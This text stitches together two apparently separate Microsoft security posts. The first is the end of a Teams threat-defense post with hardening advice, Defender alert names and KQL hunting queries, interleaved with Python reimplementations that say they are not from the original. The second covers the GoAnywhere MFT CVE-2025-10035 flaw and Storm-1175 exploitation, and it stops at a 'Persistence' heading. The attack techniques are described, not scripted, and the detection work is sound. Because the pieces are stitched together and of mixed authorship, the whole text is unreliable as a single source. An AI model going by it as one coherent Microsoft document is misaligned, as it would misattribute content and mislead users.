Understand and use attack surface reduction capabilities in your environment to prevent common techniques used in combination with Teams threat activity as part of your first line of defense.
Manage call settings in Teams. Inbound calls originating from the Public Switched Telephone Network (PSTN) on a tenant global level can be blocked.
Use meeting and event policies to control the features that are available to organizers and participants.
Use the Teams admin center or PowerShell to require anonymous users and people from untrusted organizations to complete a verification check before joining the meeting.
Manage who can present and request control to generally prevent external users by default without business justification from being able to automatically request control over a shared window or screen.
Specify which types of external meetings and chat to allow and which users should have access to these features. You can change the default setting to limit external access to only allowed domains or block specific domains and subdomains. By blocking external communication with trial-only tenants, users that do not have any purchased seats are not able to search and contact your users via chat, Teams calls, and meetings.
You can prevent users that are not managed by an organization from starting conversations or prevent chat with them. If you choose to allow anonymous users in your environment, you can verify their identities by email code to join meetings (Premium).
Monitor Teams activities using activity policies in Defender for Cloud Apps. If external users are enabled, you can monitor their presence. Defender for Cloud Apps integrates directly with Microsoft 365 audit logs. Office 365 Cloud Apps Security has access to the features of Defender for Cloud Apps to support the Office 365 app connector.
Specify which users and groups can use Microsoft Teams apps or a copilot agent and control it on a per-app basis. You can change the default setting letting users install apps by default. Evaluate the compliance, security, and data handling information of an app and also understand the permissions requested by the app before you allow an app to be used.
Teams data is encrypted in transit and at rest in Microsoft services, between services, and between clients and services. For heightened confidentiality, you can also use end-to-end encryption in advanced meeting protection that is available with the Teams Premium add-on license. This encrypts audio, video, and video-based screen sharing at its origin and decrypts it at its destination.
Get started using attack simulation training. The Teams attack simulation training is currently in private preview. Build organizational resilience by raising awareness of QR code phishing, deepfakes including voice, and about protecting your organization from tech support and ClickFix scams.
Train developers to follow best practices when working with the Microsoft Graph API. Apply these practices when detecting, defending against, and responding to malicious techniques targeting Teams.
Learn more about some of the frequent initial access threats impacting SharePoint servers. SharePoint is a front end for Microsoft Teams and an attractive target.
Configure detection and response
Verify the auditing status of your organization in Microsoft Purview to make sure you can investigate incidents. In Threat Explorer, Content malware includes files detected by Safe Attachments for Teams, and URL clicks include all user clicks in Teams.
If user reporting of messages is turned on in the Teams admin center, it also needs to be turned on in the Defender portal. We encourage you to submit user reported Teams messages to Microsoft here.
Refer to the table listing the Microsoft Teams activities logged in the Microsoft 365 audit log. With the Office 365 Management Activity API, you can retrieve information about user, admin, system, and policy actions and events including from Entra activity logs.
Familiarize yourself with relevant advanced hunting schema and available tables.
Advanced hunting supports guided and advanced modes. You can use the advanced hunting queries in the advanced hunting section to hunt with these tables for Teams-related threats.
Several tables covering Teams-related threats are available in preview and populated by Defender for Office 365, including MessageEvents, MessagePostDeliveryEvents, MessageUrlInfo, and UrlClickEvents. These tables provide visibility into ZAP events and URLs in Teams messages, including allowed or blocked URL clicks in Teams clients. You can join these tables with others to gain more comprehensive insight into the progression of the attack chain and end-to-end threat activity.
Connect Microsoft 365 to Microsoft Defender for Cloud Apps.
To hunt for Teams messages without URLs, use the CloudAppEvents table, populated by Defender for Cloud Apps. This table also includes chat monitoring events, meeting and Teams call tracking, and behavioral analytics. To make sure advanced hunting tables are populated by Defender for Cloud Apps data, go to the Defender portal and select Settings > Cloud apps > App connectors. Then, in the Select Microsoft 365 components page, select the Microsoft 365 activities checkbox. Control Microsoft 365 with built-in policies and policy templates to detect and notify you about potential threats.
Many of the detection types enabled by default apply to Teams and do not require custom policy creation, including sign-ins from geographically distant locations in a short time, access from a country not previously associated with a user, unexpected admin actions, mass downloads, activity from anonymous IP addresses or from a device flagged as malware-infected by Defender for Endpoint, as well as OAuth app abuse (when app governance is turned on).
Defender for Cloud Apps enables you to identify high-risk use and cloud security issues, detect abnormal user behavior, and prevent threats in your sanctioned cloud apps. You can integrate Defender for Cloud Apps with Microsoft Sentinel (preview) or use the supported APIs.
Refer to the compromised and malicious applications incident response playbook. This playbook includes relevant guidance for identifying and investigating malicious activity on third-party apps installed in Teams, custom apps using the Graph API for Teams, or OAuth abuse involving Teams permissions.
Discover and enable the Microsoft Sentinel data lake in Defender XDR. Sentinel data lake brings together security logs from data sources like Microsoft Defender and Microsoft Sentinel, Microsoft 365, Microsoft Entra ID, Purview, Intune, Microsoft Resource Graph, firewall and network logs, identity and access logs, DNS, plus sources from hundreds of connectors and solutions, including Microsoft Defender Threat Intelligence. Advanced hunting KQL queries can be run directly on the data lake. You can analyze the data using Jupyter notebooks.
Microsoft Defender detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender XDR
The following alerts might indicate threat activity associated with this threat.
Malicious sign in from a risky IP address
Malicious sign in from an unusual user agent
Account compromised following a password-spray attack
Compromised user account identified in Password Spray activity
Successful authentication after password spray attack
Password Spray detected via suspicious Teams client (TeamFiltration)
Microsoft Entra ID Protection
Any type of sign-in and user risk detection might also indicate threat activity associated with this threat. An example is listed below. These alerts, however, can be triggered by unrelated threat activity.
Impossible travel
Anomalous Microsoft Teams login from web client
Microsoft Defender for Endpoint
The following alerts might indicate threat activity associated with this threat.
Suspicious module loaded using Microsoft Teams
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
Suspicious usage of remote management software
Microsoft Defender for Office 365
The following alerts might indicate threat activity associated with this threat.
Malicious link shared in Teams chat
User clicked a malicious link in Teams chat
When Microsoft Defender for Cloud Apps is enabled, the following alert might indicate threat activity associated with this threat.
Potentially Malicious IT Support Teams impersonation post mail bombing
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
A potentially malicious URL click was detected
Possible AiTM phishing attempt
Microsoft Defender for Identity
The following Microsoft Defender for Identity alerts can indicate associated threat activity:
Account enumeration reconnaissance
Suspicious additions to sensitive groups
Account Enumeration reconnaissance (LDAP)
Microsoft Defender for Cloud Apps
The following alerts might indicate threat activity associated with this threat.
Consent granted to application with Microsoft Teams permissions
Risky user installed a suspicious application in Microsoft Teams
Compromised account signed in to Microsoft Teams
Microsoft Teams chat initiated by a suspicious external user
Suspicious Teams access via Graph API
The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.
Possible mail exfiltration by app
Microsoft Security Copilot
Microsoft Security Copilot customers can use the Copilot in Defender embedded experience to check the impact of this report and get insights based on their environment’s highest exposure level in Threat analytics, Intel profiles, Intel Explorer and Intel projects pages of the Defender portal.
You can also use Copilot in Defender to speed up analysis of suspicious scripts and command lines by inspecting them below the incident graph on an incident page and in the timeline on the Device entity page without using external tools.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Advanced hunting allows you to view and query all the data sources available within the unified Microsoft Defender portal, which include Microsoft Defender XDR and various Microsoft security services.
After onboarding to the Microsoft Sentinel data lake, auxiliary log tables are no longer available in Microsoft Defender advanced hunting. Instead, you can access them through data lake exploration Kusto Query Language (KQL) queries in the Defender portal. For more information, see KQL queries in the Microsoft Sentinel data lake.
You can design and tweak custom detection rules using the advanced hunting queries and set them to run at regular intervals, generating alerts and taking response actions whenever there are matches. You can also link the generated alert to this report so that it appears in the Related incidents tab in threat analytics. Custom detection rules can automatically take actions on devices, files, users, or emails that are returned by the query. To make sure you’re creating detections that trigger true alerts, take time to review your existing custom detections by following the steps in Manage existing custom detection rules.
Detect potential data exfiltration from Teams
let timeWindow = 1h;
let messageThreshold = 20;
let trustedDomains = dynamic(["trustedpartner.com", "anothertrusted.com"]);
CloudAppEvents
| where Timestamp > ago(1d)
| where ActionType == "MessageSent"
| where Application == "Microsoft Teams"
| where isnotempty(AccountObjectId)
| where tostring(parse_json(RawEventData).ParticipantInfo.HasForeignTenantUsers) == "true"
| where tostring(parse_json(RawEventData).CommunicationType) in ("OneOnOne", "GroupChat")
| extend RecipientDomain = tostring(parse_json(RawEventData).ParticipantInfo.ParticipatingDomains[1])
| where RecipientDomain !in (trustedDomains)
| extend SenderUPN = tostring(parse_json(RawEventData).UserId)
| summarize MessageCount = count() by bin(Timestamp, timeWindow), SenderUPN, RecipientDomain
| where MessageCount > messageThreshold
| project Timestamp, MessageCount, SenderUPN, RecipientDomain
| sort by MessageCount desc
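The CloudAppEvents query above is easier to reason about when its steps are spelled out outside the portal. The following is an added example, not code from the Microsoft blog: it reimplements the same filter, hourly bin, per-sender/per-domain count and threshold in Python over constructed Teams audit records, so the record shape (JSON in RawEventData, the ParticipantInfo fields) and the threshold behaviour can be tested with known input. It generalizes one step: instead of taking ParticipatingDomains[1], it counts every domain in the conversation other than the sender's own. The trusted-domain list and threshold are the query's own placeholders; the sample events are constructed.

```python
# Added example, not code from the Microsoft blog: the 'bulk messaging to
# untrusted external tenants' logic of the CloudAppEvents query, run over
# constructed Teams audit records.
import json
from collections import Counter
from datetime import datetime

TRUSTED_DOMAINS = {"trustedpartner.com", "anothertrusted.com"}  # placeholders from the query
MESSAGE_THRESHOLD = 20                                          # messageThreshold in the query


def _hour_bin(ts: str) -> datetime:
    """Truncate an ISO-8601 timestamp to the hour (bin(Timestamp, 1h) in KQL)."""
    t = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    return t.replace(minute=0, second=0, microsecond=0)


def _foreign_domains(raw: dict, sender_upn: str) -> set:
    """Domains in the conversation other than the sender's own.
    The KQL takes ParticipatingDomains[1]; this generalizes to every foreign
    domain, so a group chat spanning several tenants counts against each."""
    own = sender_upn.rsplit("@", 1)[-1].lower()
    domains = raw.get("ParticipantInfo", {}).get("ParticipatingDomains", [])
    return {d.lower() for d in domains if d.lower() != own}


def detect_bulk_external_messaging(events, threshold=MESSAGE_THRESHOLD,
                                   trusted=TRUSTED_DOMAINS):
    """Return one row per (hour, sender, external domain) whose message count
    exceeds the threshold, highest count first."""
    counts = Counter()
    for ev in events:
        if ev.get("Application") != "Microsoft Teams":
            continue
        if ev.get("ActionType") != "MessageSent" or not ev.get("AccountObjectId"):
            continue
        raw = ev["RawEventData"]
        if isinstance(raw, str):  # CloudAppEvents carries RawEventData as JSON text
            raw = json.loads(raw)
        pinfo = raw.get("ParticipantInfo", {})
        if str(pinfo.get("HasForeignTenantUsers")).lower() != "true":
            continue
        if raw.get("CommunicationType") not in ("OneOnOne", "GroupChat"):
            continue
        sender = raw.get("UserId", "").lower()
        for domain in _foreign_domains(raw, sender) - set(trusted):
            counts[(_hour_bin(ev["Timestamp"]), sender, domain)] += 1
    hits = [{"Timestamp": hour.isoformat(), "MessageCount": n,
             "SenderUPN": sender, "RecipientDomain": domain}
            for (hour, sender, domain), n in counts.items() if n > threshold]
    return sorted(hits, key=lambda h: h["MessageCount"], reverse=True)


def _event(ts, sender, domains, comm="OneOnOne", foreign=True):
    """Constructed CloudAppEvents-like record (sample data, not real logs)."""
    raw = {"UserId": sender, "CommunicationType": comm,
           "ParticipantInfo": {"HasForeignTenantUsers": foreign,
                               "ParticipatingDomains": domains}}
    return {"Timestamp": ts, "ActionType": "MessageSent",
            "Application": "Microsoft Teams",
            "AccountObjectId": "11111111-0000-0000-0000-000000000001",
            "RawEventData": json.dumps(raw)}


SAMPLE_EVENTS = (
    # 25 one-on-one messages within one hour to an unknown tenant: should fire
    [_event(f"2025-06-01T10:{m:02d}:00Z", "alice@contoso.com",
            ["contoso.com", "unknown-tenant.example"]) for m in range(25)]
    # traffic to trusted partners and a purely internal chat: should not fire
    + [_event(f"2025-06-01T10:{m:02d}:00Z", "alice@contoso.com",
              ["contoso.com", "trustedpartner.com"]) for m in range(5)]
    + [_event(f"2025-06-01T11:{m:02d}:00Z", "bob@contoso.com",
              ["contoso.com", "anothertrusted.com"], comm="GroupChat") for m in range(3)]
    + [_event("2025-06-01T10:05:00Z", "carol@contoso.com", ["contoso.com"], foreign=False)]
)

if __name__ == "__main__":
    for hit in detect_bulk_external_messaging(SAMPLE_EVENTS):
        print(hit)
```

Run on the constructed sample, only alice's 25 messages to unknown-tenant.example in the 10:00 bin exceed the threshold; the trusted-partner traffic and the internal chat are dropped before counting, which is the same behaviour the KQL `!in (trustedDomains)` and `HasForeignTenantUsers` filters give.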
Detect mail bombing that sometimes precedes technical support scams on Microsoft Teams
EmailEvents
| where Timestamp > ago(1d)
| where DetectionMethods contains "Mail bombing"
| project Timestamp, NetworkMessageId, SenderFromAddress, Subject, ReportId
Detect malicious Teams content from MessageEvents
MessageEvents
| where Timestamp > ago(1d)
| where ThreatTypes has "Phish"
or ThreatTypes has "Malware"
or ThreatTypes has "Spam"
| project Timestamp, SenderDisplayName, SenderEmailAddress, RecipientDetails, IsOwnedThread, ThreadType, IsExternalThread, ReportId
Detect communication with external help desk/support representatives
MessageEvents
| where Timestamp > ago(5d)
| where IsExternalThread == true
| where (RecipientDetails contains "help" and RecipientDetails contains "desk")
or (RecipientDetails contains "it" and RecipientDetails contains "support")
or (RecipientDetails contains "working" and RecipientDetails contains "home")
or (SenderDisplayName contains "help" and SenderDisplayName contains "desk")
or (SenderDisplayName contains "it" and SenderDisplayName contains "support")
or (SenderDisplayName contains "working" and SenderDisplayName contains "home")
| project Timestamp, SenderDisplayName, SenderEmailAddress, RecipientDetails, IsOwnedThread, ThreadType
Expand detection of communication with external help desk/support representatives by searching for linked process executions
let portableExecutable = pack_array("binary.exe", "portable.exe");
let timeAgo = ago(30d);
MessageEvents
| where Timestamp > timeAgo
| where IsExternalThread == true
| where (RecipientDetails contains "help" and RecipientDetails contains "desk")
or (RecipientDetails contains "it" and RecipientDetails contains "support")
or (RecipientDetails contains "working" and RecipientDetails contains "home")
| summarize spamEvent = min(Timestamp) by SenderEmailAddress
| join kind=inner (
DeviceProcessEvents
| where Timestamp > timeAgo
| where FileName in (portableExecutable)
) on $left.SenderEmailAddress == $right.InitiatingProcessAccountUpn
| where spamEvent < Timestamp // keep only process launches that happened after the first help desk contact
Surface Teams threat activity using Microsoft Security Copilot
Microsoft Security Copilot in Microsoft Defender comes with a query assistant capability in advanced hunting. You can also run the following prompt in Microsoft Security Copilot pane in the Advanced hunting page or by reopening Copilot from the top of the query editor:
Show me recent activity in the last 7 days that matches attack techniques described in the Microsoft Teams technique profile. Include relevant alerts, affected users and devices, and generate advanced hunting queries to investigate further.
Microsoft Sentinel
Possible Teams phishing activity
This query specifically monitors Microsoft Teams for one-on-one chats involving impersonated users (e.g., 'Help Desk', 'Microsoft Security').
let suspiciousUpns = DeviceProcessEvents
| where DeviceId == "alertedMachine"
| where isnotempty(InitiatingProcessAccountUpn)
| project InitiatingProcessAccountUpn;
CloudAppEvents
| where Application == "Microsoft Teams"
| where ActionType == "ChatCreated"
| where isempty(AccountObjectId)
| where RawEventData.ParticipantInfo.HasForeignTenantUsers == true
| where RawEventData.CommunicationType == "OneOnOne" // same value as the CloudAppEvents query above; == is case-sensitive
| where RawEventData.ParticipantInfo.HasGuestUsers == false
| where RawEventData.ParticipantInfo.HasOtherGuestUsers == false
| where RawEventData.Members[0].DisplayName in ("Microsoft Security", "Help Desk", "Help Desk Team", "Help Desk IT", "office")
| where AccountId has "@"
| extend TargetUPN = tolower(tostring(RawEventData.Members[1].UPN))
| where TargetUPN in (suspiciousUpns)
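The three help-desk queries above (communication with external help desk/support representatives, its extension to linked process executions, and this Sentinel query for impersonated one-on-one chats) share one idea: find the internal account that chatted with an external party whose name reads like support staff, then look at what that account ran afterwards. The following is an added example, not Microsoft's code, that combines those steps in Python over constructed records. It assumes a flattened message record with a RecipientEmailAddress field (a simplification of the dynamic RecipientDetails column), uses the queries' own placeholder binary names, and compares the process time against the first support-style contact, as the restored `spamEvent < Timestamp` condition does.

```python
# Added example, not Microsoft's code: correlate Teams chats with a
# help-desk-looking external party to later process launches on the
# same account, over constructed MessageEvents/DeviceProcessEvents-like records.
from datetime import datetime

# Word pairs from the 'contains' clauses and display names from the Sentinel query.
IMPERSONATION_PAIRS = (("help", "desk"), ("it", "support"), ("working", "home"))
IMPERSONATED_NAMES = {"microsoft security", "help desk", "help desk team",
                      "help desk it", "office"}
WATCHED_BINARIES = {"binary.exe", "portable.exe"}  # placeholders, as in the query


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def looks_like_support(text: str) -> bool:
    """Mirror the KQL matching. Note that 'contains' is a substring test, so the
    ('it', 'support') pair also matches names such as 'Quality Support'; tune
    the pairs to your tenant before turning this into a detection."""
    t = text.lower()
    return t.strip() in IMPERSONATED_NAMES or any(a in t and b in t for a, b in IMPERSONATION_PAIRS)


def internal_party(msg: dict):
    """Return the internal UPN in an external thread whose other side looks like
    a help desk, or None when the thread is internal or nobody matches."""
    if not msg["IsExternalThread"]:
        return None
    if looks_like_support(msg["SenderDisplayName"]):      # external 'help desk' wrote to us
        return msg["RecipientEmailAddress"].lower()
    if looks_like_support(msg["RecipientDetails"]):       # we wrote to an external 'help desk'
        return msg["SenderEmailAddress"].lower()
    return None


def first_support_contact(messages):
    """Earliest support-style external contact per internal account (min(Timestamp))."""
    first = {}
    for m in messages:
        upn = internal_party(m)
        if upn is None:
            continue
        t = _ts(m["Timestamp"])
        if upn not in first or t < first[upn]:
            first[upn] = t
    return first


def correlate_with_processes(messages, processes, watched=WATCHED_BINARIES):
    """Join on the account UPN and keep only watched binaries launched after the contact."""
    first = first_support_contact(messages)
    hits = []
    for p in processes:
        upn = p["InitiatingProcessAccountUpn"].lower()
        if upn in first and p["FileName"].lower() in watched and _ts(p["Timestamp"]) > first[upn]:
            hits.append({"Account": upn, "FirstSupportContact": first[upn].isoformat(),
                         "FileName": p["FileName"], "ProcessTime": p["Timestamp"]})
    return hits


def _msg(ts, sender_name, sender, recipient_details, recipient, external=True):
    """Constructed MessageEvents-like record (sample data, not real logs)."""
    return {"Timestamp": ts, "SenderDisplayName": sender_name, "SenderEmailAddress": sender,
            "RecipientDetails": recipient_details, "RecipientEmailAddress": recipient,
            "IsExternalThread": external}


SAMPLE_MESSAGES = [
    _msg("2025-06-02T09:00:00Z", "Help Desk IT", "helpdesk@outside-tenant.example", "Bob Jones", "bob@contoso.com"),
    _msg("2025-06-02T09:30:00Z", "Dana Lee", "dana@contoso.com", "IT Support", "support@outside-tenant.example"),
    _msg("2025-06-02T09:45:00Z", "Eve Park", "eve@contoso.com", "Project Sync", "pm@partner.example"),
    _msg("2025-06-02T08:00:00Z", "Help Desk", "helpdesk@contoso.com", "Bob Jones", "bob@contoso.com", external=False),
]
SAMPLE_PROCESSES = [  # constructed DeviceProcessEvents-like records
    {"Timestamp": "2025-06-02T09:20:00Z", "InitiatingProcessAccountUpn": "bob@contoso.com", "FileName": "portable.exe"},
    {"Timestamp": "2025-06-02T09:10:00Z", "InitiatingProcessAccountUpn": "dana@contoso.com", "FileName": "binary.exe"},
    {"Timestamp": "2025-06-02T10:00:00Z", "InitiatingProcessAccountUpn": "eve@contoso.com", "FileName": "binary.exe"},
    {"Timestamp": "2025-06-02T09:25:00Z", "InitiatingProcessAccountUpn": "bob@contoso.com", "FileName": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in correlate_with_processes(SAMPLE_MESSAGES, SAMPLE_PROCESSES):
        print(hit)
```

On the sample, only bob's portable.exe launch at 09:20 follows his 09:00 chat with "Help Desk IT"; dana's binary.exe ran before her contact, eve never spoke to a support-style party, and the internal help desk thread is ignored because it is not an external thread.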
Files uploaded to Teams and access summary
This query identifies files uploaded to Microsoft Teams chat files and their access history, specifically mentioning operations from SharePoint. It allows tracking of potential file collection activity through Teams-related storage.
OfficeActivity
| where RecordType =~ "SharePointFileOperation"
| where Operation =~ "FileUploaded"
| where UserId != "app@sharepoint"
| where SourceRelativeUrl has "Microsoft Teams Chat Files"
| join kind= leftouter (
OfficeActivity
| where RecordType =~ "SharePointFileOperation"
| where Operation =~ "FileDownloaded" or Operation =~ "FileAccessed"
| where UserId != "app@sharepoint"
| where SourceRelativeUrl has "Microsoft Teams Chat Files"
) on OfficeObjectId
| extend userBag = bag_pack(UserId1, ClientIP1)
| summarize make_set(UserId1, 10000), make_bag(userBag, 10000) by TimeGenerated, UserId, OfficeObjectId, SourceFileName
| extend NumberUsers = array_length(bag_keys(bag_userBag))
| project timestamp=TimeGenerated, UserId, FileLocation=OfficeObjectId, FileName=SourceFileName, AccessedBy=bag_userBag, NumberOfUsersAccessed=NumberUsers
| extend AccountName = tostring(split(UserId, "@")[0]), AccountUPNSuffix = tostring(split(UserId, "@")[1])
| extend Account_0_Name = AccountName
| extend Account_0_UPNSuffix = AccountUPNSuffix
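The Sentinel query above joins every upload to "Microsoft Teams Chat Files" with the later download and access events for the same object, then packs the accessing users and their client IPs into a bag. The following is an added example, not the query's own code, that produces the same per-upload summary in Python over constructed OfficeActivity-like records, so the join semantics (one row per upload, system account excluded, accessors keyed by user) can be checked on known input. It goes one step further than the KQL by keeping every client IP seen per user rather than the last one, and by listing accessors other than the uploader, which is the signal a collection hunt cares about. Object IDs, users and IPs are constructed sample values.

```python
# Added example, not the Sentinel query's own code: summarize who accessed each
# file uploaded to Teams chat files, over constructed OfficeActivity-like records.
from collections import defaultdict

CHAT_FILES_MARKER = "Microsoft Teams Chat Files"
SYSTEM_ACCOUNT = "app@sharepoint"  # background SharePoint activity the query excludes


def _is_chat_file_op(ev: dict, operations) -> bool:
    return (ev.get("RecordType") == "SharePointFileOperation"
            and ev.get("Operation") in operations
            and ev.get("UserId") != SYSTEM_ACCOUNT
            and CHAT_FILES_MARKER in ev.get("SourceRelativeUrl", ""))


def summarize_chat_file_access(events):
    """One row per chat-file upload with every account (and the client IPs it
    used) that downloaded or opened the same object. The KQL make_bag keeps a
    single IP per user; this keeps all of them."""
    accesses = defaultdict(lambda: defaultdict(set))
    for ev in events:
        if _is_chat_file_op(ev, ("FileDownloaded", "FileAccessed")):
            accesses[ev["OfficeObjectId"]][ev["UserId"]].add(ev.get("ClientIP", ""))
    rows = []
    for ev in events:
        if not _is_chat_file_op(ev, ("FileUploaded",)):
            continue
        accessed_by = {u: sorted(ips) for u, ips in accesses[ev["OfficeObjectId"]].items()}
        name, _, suffix = ev["UserId"].partition("@")
        rows.append({
            "timestamp": ev["TimeGenerated"],
            "UserId": ev["UserId"],
            "FileLocation": ev["OfficeObjectId"],
            "FileName": ev["SourceFileName"],
            "AccessedBy": accessed_by,
            "NumberOfUsersAccessed": len(accessed_by),
            # accessors other than the uploader are the ones worth reviewing
            "AccessedByOthers": sorted(u for u in accessed_by if u != ev["UserId"]),
            "AccountName": name,
            "AccountUPNSuffix": suffix,
        })
    return rows


def _op(ts, op, user, obj, fname, url="Shared Documents/" + CHAT_FILES_MARKER,
        ip="203.0.113.10"):
    """Constructed OfficeActivity-like record (sample data; IPs are RFC 5737 test addresses)."""
    return {"TimeGenerated": ts, "RecordType": "SharePointFileOperation", "Operation": op,
            "UserId": user, "OfficeObjectId": obj, "SourceFileName": fname,
            "SourceRelativeUrl": url, "ClientIP": ip}


SAMPLE_EVENTS = [
    _op("2025-06-03T12:00:00Z", "FileUploaded", "alice@contoso.com", "obj-1", "invoices.xlsx"),
    _op("2025-06-03T12:05:00Z", "FileDownloaded", "bob@contoso.com", "obj-1", "invoices.xlsx", ip="198.51.100.7"),
    _op("2025-06-03T12:06:00Z", "FileAccessed", "bob@contoso.com", "obj-1", "invoices.xlsx", ip="198.51.100.8"),
    _op("2025-06-03T12:10:00Z", "FileDownloaded", "carol@contoso.com", "obj-1", "invoices.xlsx"),
    _op("2025-06-03T12:20:00Z", "FileUploaded", "dana@contoso.com", "obj-2", "notes.docx"),
    # a team-site upload outside chat files and a system-account access: both excluded
    _op("2025-06-03T12:30:00Z", "FileUploaded", "erin@contoso.com", "obj-3", "plan.pptx", url="Shared Documents/General"),
    _op("2025-06-03T12:31:00Z", "FileAccessed", SYSTEM_ACCOUNT, "obj-2", "notes.docx"),
]

if __name__ == "__main__":
    for row in summarize_chat_file_access(SAMPLE_EVENTS):
        print(row["FileName"], row["NumberOfUsersAccessed"], row["AccessedByOthers"])
```

On the sample, invoices.xlsx shows two accessing users (bob from two IPs, carol from one) and notes.docx shows none, because the only access to it came from the excluded app@sharepoint account; the team-site upload never appears because its path lacks the chat-files marker.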
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
On September 18, 2025, Fortra published a security advisory regarding a critical deserialization vulnerability in GoAnywhere MFT’s License Servlet, which is tracked as CVE-2025-10035 and has a CVSS score of 10.0. The vulnerability could allow a threat actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection and potential remote code execution (RCE). A cybercriminal group tracked by Microsoft Threat Intelligence as Storm-1175, known for deploying Medusa ransomware and exploiting public-facing applications for initial access, was observed exploiting the vulnerability.
Microsoft urges customers to upgrade to the latest version following Fortra’s recommendations. We are publishing this blog post to increase awareness of this threat and to share end-to-end protection coverage details across Microsoft Defender, as well as security posture hardening recommendations for customers.
Vulnerability analysis
The vulnerability, tracked as CVE-2025-10035, is a critical deserialization flaw impacting GoAnywhere MFT’s License Servlet Admin Console versions up to 7.8.3. It enables an attacker to bypass signature verification by crafting a forged license response signature, which then allows the deserialization of arbitrary, attacker-controlled objects.
Successful exploitation could result in command injection and potential RCE on the affected system. Public reports indicate that exploitation does not require authentication if the attacker can craft or intercept valid license responses, making this vulnerability particularly dangerous for internet-exposed instances.
The impact of CVE-2025-10035 is amplified by the fact that, upon successful exploitation, attackers could perform system and user discovery, maintain long-term access, and deploy additional tools for lateral movement and malware. Public advisories recommend immediate patching, reviewing license verification mechanisms, and closely monitoring for suspicious activity in GoAnywhere MFT environments to mitigate risks associated with this vulnerability.
Exploitation activity by Storm-1175
Microsoft Defender researchers identified exploitation activity in multiple organizations aligned to tactics, techniques, and procedures (TTPs) attributed to Storm-1175. Related activity was observed on September 11, 2025.
An analysis of the threat actor’s TTPs reveals a multi-stage attack. For initial access, the threat actor exploited the then-zero-day deserialization vulnerability in GoAnywhere MFT. To maintain persistence, they abused remote monitoring and management (RMM) tools, specifically SimpleHelp and MeshAgent. They dropped the RMM binaries directly under the GoAnywhere MFT process. In addition to these RMM payloads, the creation of .jsp files within the GoAnywhere MFT directories was observed, often at the same time as the dropped RMM tools.
The threat actor then executed user and system discovery commands and deployed tools like netscan for network discovery. Lateral movement was achieved using mstsc.exe, allowing the threat actor to move across systems within the compromised network.
For command and control (C2), the threat actor utilized RMM tools to establish their infrastructure and even set up a Cloudflare tunnel for secure C2 communication. During the exfiltration stage, the deployment and execution of Rclone was observed in at least one victim environment. Ultimately, in one compromised environment, the successful deployment of Medusa ransomware was observed.
Mitigation and protection guidance
Microsoft recommends the following mitigations to reduce the impact of this threat.
Upgrade to the latest version following Fortra’s recommendations. Note that upgrading does not address previous exploitation activity, and review of the impacted system may be required.
Use an enterprise attack surface management product, like Microsoft Defender External Attack Surface Management (Defender EASM), to discover unpatched systems on your perimeter.
Check your perimeter firewall and proxy to ensure servers are restricted from accessing the internet for arbitrary connections, like browsing and downloads. Such restrictions help inhibit malware downloads and command-and-control activity.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
Turn on block mode in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks. Attack surface reduction rules are sweeping settings that are effective at stopping entire classes of threats:
Following the release of the vulnerability, the Microsoft Defender Research Team ensured that protections are deployed for customers, from ensuring that Microsoft Defender Vulnerability Management correctly identifies and surfaces all vulnerable devices in impacted customer environments, to building Microsoft Defender for Endpoint detections and alerting along the attack chain.
Microsoft Defender Vulnerability Management customers can search for this vulnerability in the Defender Portal or navigate directly to the CVE page to view a detailed list of the exposed devices within their organization.
Customers of Microsoft Defender Experts for XDR that might have been impacted have also been notified of any post-exploitation activity and recommended actions.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
Exploitation of GoAnywhere MFT via deserialization in Licensing Service
Microsoft Defender for Endpoint detects possible exploitation via the following alert: – Possible exploitation of GoAnywhere MFT vulnerability
Microsoft Defender Experts for XDR can detect possible exploitation via the following alerts: – Possible exploitation of vulnerability in GoAnywhere Tomcat – Possible discovery activity following successful Tomcat vulnerability exploitation
Microsoft Defender Vulnerability Management(MDVM) surfaces devices vulnerable to CVE-2025-10035.
Microsoft Defender External Attack Surface Management Attack Surface Insights with the following title can indicate vulnerable devices on your network but is not necessarily indicative of exploitation: – [Potential] CVE-2025-10035 – GoAnywhere MFT Command Injection via Deserialization in Licensing Service
(Note: An Attack Surface Insight marked as potential indicates a service is running but cannot validate whether that service is running a vulnerable version. Check resources to verify that they are up to date.)
Persistence
